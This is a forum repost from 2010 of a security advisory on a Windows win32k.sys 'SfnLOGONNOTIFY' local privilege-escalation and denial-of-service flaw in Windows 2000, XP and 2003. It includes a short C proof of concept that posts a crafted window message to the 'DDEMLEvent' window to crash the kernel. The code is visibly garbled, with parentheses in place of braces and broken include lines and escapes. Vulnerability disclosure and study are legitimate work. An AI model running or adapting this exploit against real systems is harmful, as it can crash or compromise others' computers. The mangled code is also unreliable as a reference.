首页
社区
课程
招聘
[转帖][推荐]Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (
2010-8-11 12:13 3647

[转帖][推荐]Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (

2010-8-11 12:13
3647
# Source: http://www.securityfocus.com/bid/39630/info  

   

Microsoft Windows is prone to a local privilege-escalation vulnerability.  

   

A local attacker may exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts may cause a denial-of-service condition.  

   

Microsoft Windows 2000, Windows XP and Windows 2003 are affected by this issue.   

   

# Include "stdafx.h"  

# Include "windows.h"  

int main (int argc, char * argv [])  

(  

printf("Microsoft Windows Win32k.sys SfnLOGONNOTIFY Local D.O.S Vuln\nBy MJ0011\nth_decoder@126.com\nPressEnter");  

   

getchar();  

   

HWND hwnd = FindWindow ("DDEMLEvent", NULL);  

   

if (hwnd == 0)  

(  

   printf ("cannot find DDEMLEvent Window! \ n");  

   return 0;  

)  

   

PostMessage (hwnd, 0x4c, 0x4, 0x80000000);  

   

   

return 0;  

)

[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。

收藏
点赞0
打赏
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回